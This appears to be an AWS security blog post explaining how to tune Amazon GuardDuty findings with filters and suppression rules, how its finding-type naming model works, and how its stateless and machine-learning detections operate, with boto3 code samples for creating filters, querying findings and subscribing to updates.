When GuardDuty detects potential malicious activity, it uses a standardized finding format to communicate the details about the specific finding. The attributes in a finding can be queried with filters, saved as filter rules, or used in suppression rules to improve visibility and reduce analyst fatigue.

Suppress findings from vulnerability scanners

A common example of tuning your GuardDuty deployment is to use suppression rules to automatically archive new Recon:EC2/Portscan findings from vulnerability assessment tools in your accounts. This is a best practice designed to reduce noise (and thereby improve your S/N) and analyst fatigue.

The first criterion in the suppression rule should use the Finding type attribute with a value of Recon:EC2/Portscan. The second criterion should match the instance or instances that host these vulnerability assessment tools. You can use the Instance image ID attribute, the Network connection remote IPv4 address, or the Tag value attribute, depending on which attribute identifies the instances that host these tools. In the example shown in Figure 1, we used the remote IPv4 address; an API-based version of the same rule is sketched after the figure.

Figure 1: GuardDuty filter for vulnerability scanners
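
If you manage GuardDuty programmatically, the same rule can be created with the CreateFilter API. The boto3 sketch below is a hedged example: the detector ID, rule name, and scanner IP address are placeholders, and the criterion field names reflect GuardDuty’s documented filter attributes, so confirm them against the current documentation.

import boto3
guardduty = boto3.client("guardduty", region_name="us-east-1")  # placeholder Region
DETECTOR_ID = "12abc34d567e8fa901bc2d34e56789f0"  # placeholder detector ID
SCANNER_IP = "198.51.100.10"                      # placeholder IP associated with the scanner
# Action="ARCHIVE" makes this a suppression rule: matching findings are
# auto-archived instead of surfacing to analysts.
guardduty.create_filter(
    DetectorId=DETECTOR_ID,
    Name="suppress-vuln-scanner-portscans",
    Action="ARCHIVE",
    FindingCriteria={
        "Criterion": {
            "type": {"Eq": ["Recon:EC2/Portscan"]},
            "service.action.networkConnectionAction.remoteIpDetails.ipAddressV4": {
                "Eq": [SCANNER_IP]
            },
        }
    },
)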

Filter on activity that was not blocked by security groups or NACL

If you want visibility into the GuardDuty detections that weren’t blocked by preventative measures such as a network ACL (NACL) or security group, you can filter by the attribute Network connection blocked = False, as shown in Figure 2. This can provide visibility into potential changes in your filtering strategy to reduce your risk.

Figure 2: GuardDuty filter for activity not blocked by security groups or NACLs

Filter on specific malicious IP addresses

Some customers want to track specific malicious IP addresses to see whether they are generating findings. If you want to see whether a single source IP address is responsible for CloudTrail-based findings, you can filter by the API caller IPv4 address attribute.

Figure 3: GuardDuty filter for specific malicious IP address

Filter on specific threat provider

Maybe you want to know how many findings are generated from a threat intelligence provider or from your own threat lists. You can filter by the attribute Threat list name to see whether the potential attacker is on a threat list from CrowdStrike, Proofpoint, AWS, or one of your own threat lists that you uploaded to GuardDuty. A combined, API-based version of the filters in these three sections is sketched after Figure 4.

Figure 4: GuardDuty filter for specific threat intelligence list provider
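
For completeness, here is a hedged boto3 sketch that runs the three filters above (not-blocked network activity, a specific API caller IP, and a specific threat list) as ListFindings queries. The detector ID, IP address, and threat list name are placeholders, and the criterion field names should be checked against the GuardDuty filter attribute documentation.

import boto3
guardduty = boto3.client("guardduty", region_name="us-east-1")  # placeholder Region
DETECTOR_ID = "12abc34d567e8fa901bc2d34e56789f0"  # placeholder detector ID
# Each entry pairs a label with a criterion that mirrors one of the console
# filters above; the IP address and threat list name are placeholders.
queries = {
    "not blocked by security groups or NACLs": {
        "service.action.networkConnectionAction.blocked": {"Eq": ["false"]},
    },
    "CloudTrail findings from one caller IP": {
        "service.action.awsApiCallAction.remoteIpDetails.ipAddressV4": {"Eq": ["203.0.113.99"]},
    },
    "findings sourced from a specific threat list": {
        "service.additionalInfo.threatListName": {"Eq": ["MyCustomThreatList"]},
    },
}
for label, criterion in queries.items():
    finding_ids = guardduty.list_findings(
        DetectorId=DETECTOR_ID,
        FindingCriteria={"Criterion": criterion},
    )["FindingIds"]
    print(f"{label}: {len(finding_ids)} finding(s)")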

Finding types and formats

Now that you know a little more about GuardDuty and tuning findings by using filters and suppression rules, let’s dive into the finding types that are generated by a GuardDuty detection. The first thing to know is that all GuardDuty findings use the following model:


ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact

This model is intended to communicate core information to security teams on the nature of the potential risk, the AWS resource types that are potentially impacted, and the threat family name, variants, and artifacts of the detected activity in your account. The Threat Purpose field describes the primary purpose of a threat or a potential attack on your environment.

Let’s take the Backdoor:EC2/C&CActivity.B!DNS finding as an example.


ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact
Backdoor     :EC2                 /C&CActivity     .B                  !DNS

The Backdoor threat purpose indicates an attempt to bypass normal security controls on a specific Amazon Elastic Compute Cloud (EC2) instance. In this example, the EC2 instance in your AWS environment is querying a domain name associated with a known command and control (C&C) server, and the DNS artifact indicates the activity was observed in DNS logs. This is a high-severity finding, because there are enough indicators that malware is on your host and acting with malicious intent.
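
To make the naming model concrete, here is a small Python sketch (not part of GuardDuty itself) that splits a finding type string into the fields described above; it assumes the variant and artifact segments may be absent, as they are for some finding types.

import re
# ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact
# The variant and artifact segments are optional in some finding types.
FINDING_TYPE_PATTERN = re.compile(
    r"^(?P<threat_purpose>[^:]+):"
    r"(?P<resource_type>[^/]+)/"
    r"(?P<threat_family>[^.!]+)"
    r"(?:\.(?P<variant>[^!]+))?"
    r"(?:!(?P<artifact>.+))?$"
)

def parse_finding_type(finding_type):
    """Split a GuardDuty finding type string into its named components."""
    match = FINDING_TYPE_PATTERN.match(finding_type)
    if not match:
        raise ValueError(f"Unrecognized finding type format: {finding_type}")
    return {name: value for name, value in match.groupdict().items() if value is not None}

print(parse_finding_type("Backdoor:EC2/C&CActivity.B!DNS"))
# {'threat_purpose': 'Backdoor', 'resource_type': 'EC2',
#  'threat_family': 'C&CActivity', 'variant': 'B', 'artifact': 'DNS'}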

GuardDuty, at the time of this writing, supports the following finding types:

  • Backdoor finding types
  • Behavior finding types
  • CryptoCurrency finding types
  • PenTest finding types
  • Persistence finding types
  • Policy finding types
  • PrivilegeEscalation finding types
  • Recon finding types
  • ResourceConsumption finding types
  • Stealth finding types
  • Trojan finding types
  • Unauthorized finding types

OK, now you know about the model for GuardDuty findings, but how does GuardDuty work?

When you enable GuardDuty, the service evaluates events in both a stateless and stateful manner, which allows us to use machine learning and anomaly detection in addition to signatures and threat intelligence. Some stateless examples include the Backdoor:EC2/C&CActivity.B!DNS or the CryptoCurrency:EC2/BitcoinTool.B finding types, where GuardDuty only needs to see a single DNS query, VPC Flow Log entry, or CloudTrail record to detect potentially malicious activity.

Stateful detections are driven by anomaly detection and machine learning models that identify behaviors that deviate from a baseline. The machine learning detections typically require more time to train the models and potentially use multiple events for triggering the detection.

The typical triggers for behavioral detections vary based on the log source and the detection in question. The behavioral detections learn about typical network or user activity to set a baseline, after which the anomaly detections change from a learning mode to an active mode. In active mode, you only see findings generated from these detections if the service observes behavior that suggests a deviation. Some examples of machine learning–based detections include the Backdoor:EC2/DenialOfService.Dns, UnauthorizedAccess:IAMUser/ConsoleLogin, and Behavior:EC2/NetworkPortUnusual finding types.

Why does this matter?

We know the SOC has the tough job of keeping organizations secure with limited resources, and with a high degree of technical and operational overhead due to a large portfolio of tools. This can impact the ability to detect and respond to security events. For example, CrowdStrike tracks the concept of breakout time—the window of time from when an outside party first gains unauthorized access to an endpoint machine, to when they begin moving laterally across your network. They have found that average breakout times range from 19 minutes to 10 hours. If the SOC is overburdened with undifferentiated technical and operational overhead, it can struggle to improve monitoring, detection, and response. To act quickly, we have to decrease both detection time and the overhead burden that numerous tools place on the SOC. The best way to decrease detection time is with threat intelligence and machine learning. Threat intelligence provides context to alerts and a broader perspective on cyber risk. Machine learning uses baselines to learn what normal looks like, enabling detection of anomalies in user or resource behavior and of threats that change over time. The best way to reduce SOC overhead is to share the load so that AWS services manage the undifferentiated heavy lifting, while the SOC focuses on more specific tasks that add value to the organization.

GuardDuty is a cost-optimized service that is in scope for the FedRAMP and DoD compliance programs in the US commercial and GovCloud Regions. It leverages threat intelligence and machine learning to provide detection capabilities without you having to manage, maintain, or patch any infrastructure or manage yet another security tool. With a 30-day trial period, there is no risk to evaluate the service and discover how it can support your cyber risk strategy.

If you want to receive automated updates about GuardDuty, you can subscribe to an Amazon SNS topic that will email you whenever new features and detections are released.
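
If you would rather script that subscription, the hedged boto3 sketch below shows the shape of the call; the topic ARN and email address are placeholders only, so substitute the announcements topic ARN and Region from the GuardDuty documentation and confirm the subscription email that SNS sends.

import boto3
# Placeholder topic ARN: replace with the GuardDuty announcements topic ARN and
# Region published in the AWS documentation.
TOPIC_ARN = "arn:aws:sns:us-east-1:123456789012:guardduty-announcements-placeholder"
sns = boto3.client("sns", region_name="us-east-1")
# Email subscriptions must be confirmed from the message SNS sends to this address.
sns.subscribe(
    TopicArn=TOPIC_ARN,
    Protocol="email",
    Endpoint="security-team@example.com",  # placeholder address
)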

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon GuardDuty forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Darren House

Darren brings over 20 years of experience building secure technology architectures and technical strategies to support customer outcomes. He has held several roles, including CTO, Director of Technology Solutions, Technologist, Principal Solutions Architect, and Senior Network Engineer for the USMC. Today, he is focused on enabling AWS customers to adopt security services and automations that increase visibility and reduce risk.

Author

Trish Cagliostro

Trish is a leader in the security industry, where she has spent 10 years advising public sector customers like DISA, DHS, and the US Senate, as well as commercial entities like Bank of America and United Airlines. Trish is a subject matter expert on a variety of topics, including integrating threat intelligence, and has testified before the House Homeland Security Committee about information sharing.